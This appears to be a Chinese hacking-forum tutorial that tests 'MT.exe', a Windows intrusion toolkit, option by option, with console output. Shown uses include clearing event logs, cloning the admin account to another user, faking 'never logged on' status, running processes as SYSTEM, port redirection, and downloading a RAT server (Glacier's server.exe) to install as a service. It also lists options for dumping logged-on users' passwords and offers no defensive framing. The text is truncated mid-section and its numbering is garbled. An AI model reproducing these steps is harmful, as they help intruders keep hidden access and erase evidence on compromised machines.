-poweroff ---Turn off power.
-logoff ---Logoff current user's session.
-chkts ---Check Terminal Service info.
-setupts ---Install Terminal Service.
-remts ---Remove Terminal Service.
-chgtsp ---Reset Terminal Service port.
-clog ---Clean system log.
-enumsrv ---List all services.
-querysrv ---List detail info of a specified service.
-instsrv ---Install a service.
-cfgsrv ---Changes the configuration of a service.
-remsrv ---Remove a specified service.
-startsrv ---Start a specified service.
-stopsrv ---Stop a specified service.
-netget ---Download from http/ftp.
-redirect ---Port redirect.
-chkuser ---List all account、sid and anti clone.
-clone ---Clone from admin to dest.
-never ---Set account looks like never logged on.
-killuser ---Del account. Even "guest" account.
-su ---Run process as Local_System privilege.
-findpass ---Show all logged on user's pass.
-netstat ---List TCP connections.
-killtcp ---Kill TCP connection.
-psport ---Map ports to processes.
-touch ---Set the file times for a specified file.
-secdel ---Secure delete files and directory or zap free
pace.
-regshell ---Enter a console registry editor.
-chkdll ---Detect gina dll backdoor.
大家可以看见的是,.他的功能一共有34项,包含我们我们平时使用的大部分软件.下面我就来一项一项的测试,条件和能力有限,希望大家能够指出其中的不足.
一,MT.EXE –filter
Usage:
MT -filter <ON|OFF> ----Enabld|Disable TCP/IP Filter.
从上面的说明可以知道,这个是打开关闭TCP/IP筛选的,我们先来试一下,输入命令:
D:\>MT -FILTER on

Enable TCP/IP Filter successful!
这个时候我们看看试不试打开了TCP/IP筛选,打开网络连接选项,右键本地连接---Internet协议(TCP/IP)属性----高级---选项----TCP/IP筛选-----属性,我们看到的这样的情况,如图:

可以看见,我们已经启用了这个TCP/IP筛选,再次输入命令:
D:\>MT -FILTER off

Disable TCP/IP Filter successful!
查看属性:

有了这个工具,我们就不必那样的麻烦的点击鼠标了,一切都很简单.

二, D:\>mt -addport

Usage:
mt -addport <TCP|UDP> NIC PortList ----Add ports to the allowed portlist.
Use "-nicinfo" get Nic number first.
从说明上面看,是增加端口列表中允许通讯的端口,还是和上面的一样,我们来看看这个功能是如何的强大:
五, -pslist ---List active processes.
列出活动进程,经常用PSTOOLS的很熟悉这个功能了,在这里,我将这个工具和pstools的工具相比较,看看他们的功能怎么样?
D:\>mt -pslist

PID Path
0 [Idle Process]
4 l[System]
464 \SystemRoot\System32\smss.exe
524 \??\C:\WINDOWS\system32\csrss.exe
548 \??\C:\WINDOWS\system32\winlogon.exe
592 C:\WINDOWS\system32\services.exe
604 C:\WINDOWS\system32\lsass.exe
780 C:\WINDOWS\system32\svchost.exe
844 C:\WINDOWS\System32\svchost.exe
876 C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe
932 C:\WINDOWS\System32\svchost.exe
960 C:\WINDOWS\System32\svchost.exe
1128 C:\WINDOWS\System32\alg.exe
1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe
1188 D:\mysql\bin\mysqld-nt.exe
1280 C:\WINDOWS\System32\nvsvc32.exe
1728 C:\WINDOWS\Explorer.EXE
212 C:\WINDOWS\System32\ctfmon.exe
504 D:\Program Files\Microsoft Office\Office10\WINWORD.EXE
924 D:\Program Files\MYIE2\myie.exe
1348 C:\WINDOWS\System32\dllhost.exe
1516 C:\WINDOWS\System32\dllhost.exe
1856 C:\WINDOWS\System32\msdtc.exe
1356 C:\WINDOWS\System32\cmd.exe
1004 C:\WINDOWS\System32\conime.exe
1748 D:\Program Files\HyperSnap-DX 5\HprSnap5.exe
1272 D:\MT.exe
我们使用PSLIST得到的结果:
D:\hack>pslist

PsList v1.12 - Process Information Lister
Copyright (C) 1999-2000 Mark Russinovich
Systems Internals - http://www.sysinternals.com

Process information for LIN:

Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time
Idle 0 0 1 0 20 0:00:00.000 0:40:22.453 0:00:00.000
System 4 8 56 258 40 0:00:00.000 0:00:06.098 0:00:00.000
smss 464 11 3 21 44 0:00:00.010 0:00:00.100 0:43:10.565
csrss 524 13 11 416 3892 0:00:02.042 0:00:14.240 0:43:06.449
winlogon 548 13 19 443 1044 0:00:01.171 0:00:01.882 0:43:04.185
services 592 9 21 307 940 0:00:00.721 0:00:01.662 0:43:01.582
lsass 604 9 19 304 1132 0:00:00.540 0:00:00.690 0:43:01.532
svchost 780 8 8 255 824 0:00:00.200 0:00:00.160 0:42:58.687
svchost 844 8 55 1214 5740 0:00:02.393 0:00:01.932 0:42:58.457
StyleXPSer 876 8 2 38 416 0:00:00.110 0:00:00.070 0:42:58.357
svchost 932 8 5 46 396 0:00:00.020 0:00:00.040 0:42:56.705
svchost 960 8 7 90 204 0:00:00.060 0:00:00.040 0:42:56.244
alg 1128 8 5 116 220 0:00:00.020 0:00:00.060 0:42:49.144
inetinfo 1160 8 17 281 864 0:00:00.210 0:00:00.330 0:42:49.054
mysqld-nt 1188 8 6 81 76 0:00:00.010 0:00:00.050 0:42:47.602
nvsvc32 1280 8 3 74 92 0:00:00.090 0:00:00.160 0:42:45.378
Explorer 1728 8 20 583 19548 0:00:11.436 0:00:27.519 0:42:37.607
ctfmon 212 8 1 109 1596 0:00:00.340 0:00:01.031 0:42:26.982
WINWORD 504 8 5 394 43428 0:01:04.072 0:00:25.757 0:41:26.194
myie 924 8 9 312 3116 0:00:09.623 0:00:07.460 0:35:36.582
dllhost 1348 8 23 240 1540 0:00:01.982 0:00:00.460 0:35:24.414
dllhost 1516 8 15 200 784 0:00:00.190 0:00:00.230 0:35:22.912
msdtc 1856 8 18 149 372 0:00:00.080 0:00:00.090 0:35:18.896
cmd 1356 8 1 21 592 0:00:00.080 0:00:00.100 0:32:44.414
conime 1004 8 1 25 664 0:00:00.050 0:00:00.030 0:32:42.652
HprSnap5 1748 8 6 168 1648 0:00:01.932 0:00:03.414 0:18:38.798
cmd 1548 8 1 20 1392 0:00:00.020 0:00:00.010 0:00:28.020
pslist 1716 8 2 82 1672 0:00:00.030 0:00:00.050 0:00:00.400
使用PULIST得到的结果:
E:\HACK>pulist
Process PID User
Idle 0
System 4
smss.exe 464 NT AUTHORITY\SYS
csrss.exe 524 NT AUTHORITY\SYS
winlogon.exe 548 NT AUTHORITY\SYS
services.exe 592 NT AUTHORITY\SYS
lsass.exe 604 NT AUTHORITY\SYS
svchost.exe 780 NT AUTHORITY\SYS
svchost.exe 844 NT AUTHORITY\SYS
StyleXPService.exe 876 NT AUTHORITY\SY
svchost.exe 932
svchost.exe 960
alg.exe 1128
inetinfo.exe 1160 NT AUTHORITY\SYS
mysqld-nt.exe 1188 NT AUTHORITY\SYS
nvsvc32.exe 1280 NT AUTHORITY\SYS
Explorer.EXE 1728 LIN\lin
ctfmon.exe 212 LIN\lin
WINWORD.EXE 504 LIN\lin
MyIE.exe 924 LIN\lin
dllhost.exe 1348
dllhost.exe 1516 NT AUTHORITY\SYS
msdtc.exe 1856
cmd.exe 1356 LIN\lin
conime.exe 1004 LIN\lin
HprSnap5.exe 1748 LIN\lin
cmd.exe 1548 LIN\lin
pulist.exe 1788 LIN\lin
从上面的情况可以知道,输入MT还没有PSLIST功能的强大,能够列出Name,Pid,Pri,Thd Hnd,Mem,User Time,Kernel Time,Elapsed Time,但是较于PULIST,已经是很好的了,能够列出进程名和运行路径,已经能够满足我们平时的使用了.

六, D:\>mt -pskill

Usage:
mt -pskill <PID|ProcessName>
同样也是PSTOOLS的工具之一了,我们使用MyIE.exe这个软件作为测试,看看他们能不能杀死这个进程,首先是使用MT,通过上面的MT –PSLIST,我们知道MyIE.exe的PID值是924,于是输入:
D:\>mt -pskill 924

Kill process sccuessful!
很快,MYIE就消失了,也就是被KILL了,再使用PSKILL.EXE,我们表示公平统一性,我们还是有PSLIST取得MYIE的PID值,重新打开MYIE,得到它的PID值为220,我们输入:
D:\hack>pskill 220

PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
http://www.sysinternals.com

Process 220 killed.
同样也是很快被KILL,说明MT和PSKILL的功能是一样的,使用MT也可以达到和PSKILL一样的效果.
我们发现MT一个比较弱的功能的就是没有和PSKILL一样支持网络功能,在PSKILL中可以通过pskill [\\RemoteComputer [-u Username]] <process Id or name>
-u Specifies optional user name for login to
remote computer.
杀死远程的计算机进程,当然,我们不可能指望MT也能有这样强大的功能,毕竟我们用的仅仅才只有40K.

七, D:\>mt -dlllist

Usage:
mt -dlllist <PID|ProcessName>
列出进程中相关的DLL文件,于这个相关功能的软件我没有找到,不过我们使用Windows优化大师,我们先来测试一下,这次我们选中的进程是StyleXPService.exe.还是使用MT –pslist得到其PID值876,输入:
D:\>mt -dlllist 876

C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe
C:\WINDOWS\System32\ntdll.dll
C:\WINDOWS\system32\kernel32.dll
C:\WINDOWS\system32\USER32.dll
C:\WINDOWS\system32\GDI32.dll
C:\WINDOWS\system32\ADVAPI32.dll
C:\WINDOWS\system32\RPCRT4.dll
C:\WINDOWS\system32\ole32.dll
C:\WINDOWS\system32\OLEAUT32.dll
C:\WINDOWS\system32\MSVCRT.DLL
C:\WINDOWS\system32\VERSION.dll
C:\WINDOWS\System32\SETUPAPI.dll
C:\WINDOWS\System32\NETAPI32.dll
C:\WINDOWS\System32\IMM32.DLL
C:\WINDOWS\System32\LPK.DLL
C:\WINDOWS\System32\USP10.dll
C:\WINDOWS\System32\UXTHEME.DLL
C:\WINDOWS\System32\rsaenh.dll
打开Windows优化大师,看看它得到的相关DLL文件是什么?如图:

使用MT得到的DLL相关文件和Windows优化大师的是一摸一样的,我们可以肯定使用MT绝对比使用Windows优化大师方便快捷.

八, mt –sysinfo
列出系统信息,还是使用Windows优化大师与之作比较,发现几乎没有任何的失误,可见准确性特别强的,由于页面的关系,数据不再展示. 这个功能和程序sysinfo.exe是一样的.
九, -shutdown ---Shutdown system.
-reboot ---Reboot system.
-poweroff ---Turn off power.
-logoff ---Logoff current user's session.
这4个命令就不说了,和系统工具shutdown不一样的是,输入之后没有任何的提示,直接关机,我已经试过了,幸亏还记得保存.
十, -chkts ---Check Terminal Service info.
-setupts ---Install Terminal Service.
-remts ---Remove Terminal Service.
-chgtsp ---Reset Terminal Service port.
这4个命令是和Terminal相关的,由于没有安装服务器版本的系统,所以没有测试.
十一, -clog ---Clean system log.
用来清除记录,我们输入:
D:\>mt -clog

Usage:
mt -clog <app|sec|sys|all> ---Clean Application|Security|System|All logs.
从上面的可以看出,我们可以清除 "应用程序" "安全性" "系统"3个日志,我随便选择一个,用MT删除 "应用程序"日志,输入:
D:\>mt -clog app
Clean EventLog : Application successful!
打开事件查看器,如图,

可以看出日志已经被清空,不过MT并不能和小榕的Cleariislog相比,不能删除指定IP的日志,这个可能是yy3并没有考虑将这个工具用作那样的用途.

十二, -enumsrv ---List all services.
列出所有的服务,这个测试可能你的不同,因为我已经删除了很多的服务的了,为了精简系统和提升速度,还是来看看,
D:\>mt -enumsrv

Usage:
mt -enumsrv <SRV|DRV> ----List all Win32|Driver Service

D:\>mt -enumsrv srv

Num ServiceName DisplayName

0 Alerter Alerter
1 ALG Application Layer Gateway Service
2 AppMgmt Application Management
3 aspnet_state ASP.NET State Service
4 AudioSrv Windows Audio
(省略以下大部分的内容)
D:\>mt -enumsrv drv

Num ServiceName DisplayName

0 Abiosdsk Abiosdsk
1 abp480n5 abp480n5
2 ACPI Microsoft ACPI Driver
3 ACPIEC ACPIEC
4 adpu160m adpu160m
5 aec Microsoft Kernel Acoustic Echo Canceller
6 AFD AFD 网络支持环境
7 Aha154x Aha154x
8 aic78u2 aic78u2
(省略以下大部分的内容)
实在是太多了,也不想说什么了,只有一个字----高.
十三, D:\>mt -querysrv

Usage:
mt -querysrv <ServiceName> ----Show detial info of a specifies service.
列出服务的详细信息,我们查看系统进程Alerter的信息,输入:
D:\>mt -querysrv Alerter

ServiceName: Alerter
Status: Stopped
ServiceType: Win32 Share Service
Start type: Demand Start
LogonID: NT AUTHORITY\LocalService
FilePath : C:\WINDOWS\System32\svchost.exe -k LocalService
DisplayName: Alerter
Dependency: LanmanWorkstation
Description: 通知所选用户和计算机有关系统管理级警报。如果服务停止，使用管理警
报的程序将不会受到它们。如果此服务被禁用，任何直接依赖它的服务都将不能启动。Start type: Demand Start
LogonID: NT AUTHORITY\LocalService
FilePath : C:\WINDOWS\System32\alg.exe
DisplayName: Application Layer Gateway Service
Dependency:
Description: 为 Internet 连接共享和 Internet 连接防火墙提供第三方协议插件的支
持
实在是很清楚了,当然我们也可以使用mmc查看服务的详细信息,如图:

再一次看见这个参数了,上次已经忘记的了.
十四, -instsrv ---Install a service.
-cfgsrv ---Changes the configuration of a service.
-remsrv ---Remove a specified service.
-startsrv ---Start a specified service.
-stopsrv ---Stop a specified service.
这写命令四和服务相关的,放在一起测试了,服务程序选择了冰河的服务端server.exe,我现在要作的是将这个工具作为服务安装,然后改变配置,开始服务,停止服务等,输入:
十五, D:\>mt -netget

Usage:
mt -netget <url> <filename to saved> ---Download from http/ftp.
这个工具很是实用,直到几个月前,还在安全焦点的论坛上面看见有人需要这样的工具,不过那个时候他们提供的是VBS文件,可惜我现在已经找不到那些代码了,在DOS下下载软件的东西,特别的方便.打建IIS服务器,把server.exe文件放置在根目录下面,在DOS下面输入
D:\>mt -netget http://192.168.0.1/server.exe f:\server.exe

Download File from http://192.168.0.1/server.exe to f:\server.exe.
Download completed 272992 bytes ......
Downloaded 266.6KB @266.6KB/S in 0sec.

File <f:\server.exe> TotalByte : 266 KB.
将下载回来的server.exe文件保存在F盘server.exe文件.

十六, D:\>mt -redirect

Usage:
mt -redirect <TargetIP> <TargetPort> <ListenPort> ----TCP port redirector.
这个功能和FPIPE是一样的,实现端口转换,我们这样测试,将192.168.0.1主机的80端口转化为81端口,这样输入:
D:\>mt -redirect 192.168.0.1 80 81


------Waiting Connection-----
然后另外开一个CMD,telnet到192.168.0.1的81端口,看到这样的情况,第一个CMD显示出了连接的信息,
D:\>mt -redirect 192.168.0.1 80 81


------Waiting Connection-----


Accept client==>192.168.0.1:3027
connect to 192.168.0.1 80 success!
Thread 1988 recv 2 bytes.
Thread 1988 send 2 bytes.
Thread 1988 recv 2 bytes.
Thread 1988 send 2 bytes.
Thread 316 recv 224 bytes.
Thread 316 send 224 bytes.
而第二个CMD也显示出了我们需要得到的信息:
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.1
Date: Wed, 19 May 2004 13:28:53 GMT
Content-Type: text/html
Content-Length: 87

<html><head><title>Error</title></head><body>The parameter is incorrect. </body>
</html>
不过这个功能有一点不稳定,也就是说,有时候可以,有时候又不可以,这次的成功也是重新启动以后才出现的,相对于FPIPE,是方便了很多了,置于FPIPE.exe的用法,实在是让我头痛了几天.
17, D:\>mt -clone

Usage:
mt -clone <SourUser> <DestUser>
克隆账号,有点象小榕的cloneuser,测试一下,新建一个用户yun,现在我要将管理员账号lin克隆为账号yun,输入:
D:\hack>mt -clone lin yun

Fail to Open SAM Key, 想跳楼作成功完成。
D:\>mt -clone lin yun

Fail to Open SAM Key, 想跳楼作成功完成。
可能是不支持XP系统,虽然提示说想跳楼作成功,可是事实上,使用yun登陆的时候,还是没有成功,可能也是有其缺陷或者是我自己想跳楼作失败吧.

18, D:\>mt -never
-never ---Set account looks like never logged on.
它可以设置使用户看起来从来没有登陆过,在我的系统里面有2个用户,一个是管理员lin,另外一个是公用的帐户316,现在我把316设置为从不登陆的状态.输入
D:\>mt -never 316

Require System Privilege.提示没有权限,于是

D:\>mt -su

打开新的CMD窗口,输入
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>d:

D:\>mt -never 316

Fail to Set F Value.

D:\>net user 316
用户名 316
全名 316
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不

上次设置密码 2004/5/19 下午 08:22
密码到期 从不
密码可更改 2004/5/19 下午 08:22
需要密码 Yes
用户可以更改密码 Yes

允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不

可允许的登录小时数 All

本地组成员 *Users
全局组成员 *None
命令成功完成。


D:\>
可以看出来已经修改成功了,虽然显示的是Fail to Set F Value.,但还是成功了.这个功能和never.exe是一样的，只是将特定的的帐户上回登陆时间改为帐户从来没有登陆上过系统.
成功条件:你要有local system权限

18, -killuser ---Del account. Even "guest" account.
删除用户,输入D:\>mt -killuser ziqi

Kill User: ziqi Success!
这个功能有一点问题,输入提示已经删除了,可是然后事实上,这个用户并没有删除,我们输入
D:\>net user

\\LIN 的用户帐户